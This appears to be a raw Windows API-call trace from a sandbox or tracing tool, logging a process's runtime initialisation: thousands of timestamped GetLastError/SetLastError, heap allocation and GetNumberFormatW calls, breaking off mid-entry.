[0045.764] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) [0045.764] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) [0045.764] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) [0045.764] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) [0045.764] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) [0045.764] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) [0045.764] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) [0045.764] GetLastError () returned 0x0 [0045.764] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.765] SetLastError (dwErrCode=0x0) [0045.765] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.766] SetLastError (dwErrCode=0x0) [0045.766] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.767] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.767] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.767] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.767] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x5f) returned 0x2b0950 [0045.767] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.767] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.767] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.767] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.767] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.767] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.767] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.767] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.767] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.767] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.767] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.767] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.767] GetLastError () returned 0x0 [0045.767] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.768] GetLastError () returned 0x0 [0045.768] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.769] GetLastError () returned 0x0 [0045.769] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.770] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.770] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.770] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.770] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.770] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.770] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.770] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.770] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.770] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.770] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.770] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.770] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.770] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.770] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.770] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.770] SetLastError (dwErrCode=0x0) [0045.770] GetLastError () returned 0x0 [0045.771] SetLastError (dwErrCode=0x0) [0045.771] GetLastError () returned 0x0 [0045.771] SetLastError (dwErrCode=0x0) [0045.771] GetLastError () returned 0x0 [0045.771] SetLastError (dwErrCode=0x0) [0045.771] GetLastError () returned 0x0 [0045.771] SetLastError (dwErrCode=0x0) [0045.771] GetLastError () returned 0x0 [0045.771] SetLastError (dwErrCode=0x0) [0045.771] GetLastError () returned 0x0 [0045.771] SetLastError (dwErrCode=0x0) [0045.771] GetLastError () returned 0x0 [0045.771] SetLastError (dwErrCode=0x0) [0045.771] GetLastError () returned 0x0 [0045.771] SetLastError (dwErrCode=0x0) [0045.771] GetLastError () returned 0x0 [0045.771] SetLastError (dwErrCode=0x0) [0045.771] GetLastError () returned 0x0 [0045.771] SetLastError (dwErrCode=0x0) [0045.771] GetLastError () returned 0x0 [0045.771] SetLastError (dwErrCode=0x0) [0045.771] GetLastError () returned 0x0 [0045.771] SetLastError (dwErrCode=0x0) [0045.771] GetLastError () returned 0x0 [0045.771] SetLastError (dwErrCode=0x0) [0045.771] GetLastError () returned 0x0 [0045.771] SetLastError (dwErrCode=0x0) [0045.771] GetLastError () returned 0x0 [0045.771] SetLastError (dwErrCode=0x0) [0045.771] GetLastError () returned 0x0 [0045.771] SetLastError (dwErrCode=0x0) [0045.771] GetLastError () returned 0x0 [0045.772] SetLastError (dwErrCode=0x0) [0045.772] GetLastError () returned 0x0 [0045.772] SetLastError (dwErrCode=0x0) [0045.772] GetLastError () returned 0x0 [0045.772] SetLastError (dwErrCode=0x0) [0045.772] GetLastError () returned 0x0 [0045.772] SetLastError (dwErrCode=0x0) [0045.772] GetLastError () returned 0x0 [0045.772] SetLastError (dwErrCode=0x0) [0045.772] GetLastError () returned 0x0 [0045.772] SetLastError (dwErrCode=0x0) [0045.772] GetLastError () returned 0x0 [0045.772] SetLastError (dwErrCode=0x0) [0045.772] GetLastError () returned 0x0 [0045.772] SetLastError (dwErrCode=0x0) [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x98) returned 0x2b3cd8 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1f) returned 0x2b17f0 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x36) returned 0x2b3d78 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x37) returned 0x2b3db8 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3c) returned 0x2b3df8 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x31) returned 0x2b3e40 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x17) returned 0x2b09b8 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x24) returned 0x2b3e80 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x14) returned 0x2b3eb0 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xd) returned 0x2b0bc0 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x25) returned 0x2b3ed0 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x39) returned 0x2b3f00 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x18) returned 0x2b3f48 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x17) returned 0x2b3f68 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xe) returned 0x2b0bd8 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x69) returned 0x2b2a68 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3e) returned 0x2b3f88 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1b) returned 0x2b1818 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1d) returned 0x2b1840 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x48) returned 0x2b2ae0 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x12) returned 0x2b2b30 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x18) returned 0x2b2b50 [0045.772] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1b) returned 0x2b1868 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x24) returned 0x2b2b70 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x29) returned 0x2b2ba0 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1e) returned 0x2b1890 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x41) returned 0x2b2bd8 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x17) returned 0x2b2c28 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xf) returned 0x2b0bf0 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x16) returned 0x2b2c48 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2a) returned 0x2b2c68 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x29) returned 0x2b2ca0 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x15) returned 0x2b2cd8 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1e) returned 0x2b18b8 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2a) returned 0x2b2cf8 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x12) returned 0x2b2d30 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x18) returned 0x2b2d50 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x46) returned 0x2b2d70 [0045.773] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b3540 | out: hHeap=0x2a0000) returned 1 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x80) returned 0x2b2dc0 [0045.773] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0045.773] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x800) returned 0x2b2e48 [0045.773] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x405c62) returned 0x0 [0045.774] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2b2dc0) returned 0x80 [0045.774] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2b2dc0) returned 0x80 [0045.774] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2b2dc0) returned 0x80 [0045.774] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2b2dc0) returned 0x80 [0045.774] GetLastError () returned 0x0 [0045.774] SetLastError (dwErrCode=0x0) [0045.774] GetLastError () returned 0x0 [0045.774] SetLastError (dwErrCode=0x0) [0045.774] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.775] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.775] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.775] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.775] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.775] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.775] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.775] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.775] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.775] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.775] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.775] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.775] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.775] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.775] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.775] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.775] GetLastError () returned 0x0 [0045.775] SetLastError (dwErrCode=0x0) [0045.776] GetLastError () returned 0x0 [0045.776] SetLastError (dwErrCode=0x0) [0045.776] GetLastError () returned 0x0 [0045.776] SetLastError (dwErrCode=0x0) [0045.776] GetLastError () returned 0x0 [0045.776] SetLastError (dwErrCode=0x0) [0045.776] GetLastError () returned 0x0 [0045.776] SetLastError (dwErrCode=0x0) [0045.776] GetLastError () returned 0x0 [0045.776] SetLastError (dwErrCode=0x0) [0045.776] GetLastError () returned 0x0 [0045.776] SetLastError (dwErrCode=0x0) [0045.776] GetLastError () returned 0x0 [0045.776] SetLastError (dwErrCode=0x0) [0045.776] GetLastError () returned 0x0 [0045.776] SetLastError (dwErrCode=0x0) [0045.776] GetLastError () returned 0x0 [0045.776] SetLastError (dwErrCode=0x0) [0045.776] GetLastError () returned 0x0 [0045.776] SetLastError (dwErrCode=0x0) [0045.776] GetLastError () returned 0x0 [0045.830] SetLastError (dwErrCode=0x0) [0045.830] GetLastError () returned 0x0 [0045.834] SetLastError (dwErrCode=0x0) [0045.834] GetLastError () returned 0x0 [0045.880] SetLastError (dwErrCode=0x0) [0045.880] GetLastError () returned 0x0 [0045.880] SetLastError (dwErrCode=0x0) [0045.880] GetLastError () returned 0x0 [0045.880] SetLastError (dwErrCode=0x0) [0045.880] GetLastError () returned 0x0 [0045.880] SetLastError (dwErrCode=0x0) [0045.880] GetLastError () returned 0x0 [0045.880] SetLastError (dwErrCode=0x0) [0045.880] GetLastError () returned 0x0 [0045.881] SetLastError (dwErrCode=0x0) [0045.881] GetLastError () returned 0x0 [0045.881] SetLastError (dwErrCode=0x0) [0045.881] GetLastError () returned 0x0 [0045.881] SetLastError (dwErrCode=0x0) [0045.881] GetLastError () returned 0x0 [0045.881] SetLastError (dwErrCode=0x0) [0045.881] GetLastError () returned 0x0 [0045.881] SetLastError (dwErrCode=0x0) [0045.881] GetLastError () returned 0x0 [0045.882] SetLastError (dwErrCode=0x0) [0045.882] GetLastError () returned 0x0 [0045.882] SetLastError (dwErrCode=0x0) [0045.882] GetLastError () returned 0x0 [0045.882] SetLastError (dwErrCode=0x0) [0045.882] GetLastError () returned 0x0 [0045.882] SetLastError (dwErrCode=0x0) [0045.882] GetLastError () returned 0x0 [0045.882] SetLastError (dwErrCode=0x0) [0045.882] GetLastError () returned 0x0 [0045.882] SetLastError (dwErrCode=0x0) [0045.882] GetLastError () returned 0x0 [0045.882] SetLastError (dwErrCode=0x0) [0045.882] GetLastError () returned 0x0 [0045.888] SetLastError (dwErrCode=0x0) [0045.889] GetLastError () returned 0x0 [0045.891] SetLastError (dwErrCode=0x0) [0045.891] GetLastError () returned 0x0 [0045.891] SetLastError (dwErrCode=0x0) [0045.893] GetLastError () returned 0x0 [0045.898] SetLastError (dwErrCode=0x0) [0045.898] GetLastError () returned 0x0 [0045.898] SetLastError (dwErrCode=0x0) [0045.903] GetLastError () returned 0x0 [0045.903] SetLastError (dwErrCode=0x0) [0045.903] GetLastError () returned 0x0 [0045.903] SetLastError (dwErrCode=0x0) [0045.903] GetLastError () returned 0x0 [0045.903] SetLastError (dwErrCode=0x0) [0045.903] GetLastError () returned 0x0 [0045.903] SetLastError (dwErrCode=0x0) [0045.903] GetLastError () returned 0x0 [0045.903] SetLastError (dwErrCode=0x0) [0045.903] GetLastError () returned 0x0 [0045.903] SetLastError (dwErrCode=0x0) [0045.903] GetLastError () returned 0x0 [0045.903] SetLastError (dwErrCode=0x0) [0045.903] GetLastError () returned 0x0 [0045.903] SetLastError (dwErrCode=0x0) [0045.903] GetLastError () returned 0x0 [0045.903] SetLastError (dwErrCode=0x0) [0045.903] GetLastError () returned 0x0 [0045.903] SetLastError (dwErrCode=0x0) [0045.903] GetLastError () returned 0x0 [0045.903] SetLastError (dwErrCode=0x0) [0045.903] GetLastError () returned 0x0 [0045.903] SetLastError (dwErrCode=0x0) [0045.903] GetLastError () returned 0x0 [0045.903] SetLastError (dwErrCode=0x0) [0045.903] GetLastError () returned 0x0 [0045.903] SetLastError (dwErrCode=0x0) [0045.903] GetLastError () returned 0x0 [0045.904] SetLastError (dwErrCode=0x0) [0045.904] GetLastError () returned 0x0 [0045.904] SetLastError (dwErrCode=0x0) [0045.904] GetLastError () returned 0x0 [0045.904] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.904] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.905] GetNumberFormatW (in: Locale=0x0, 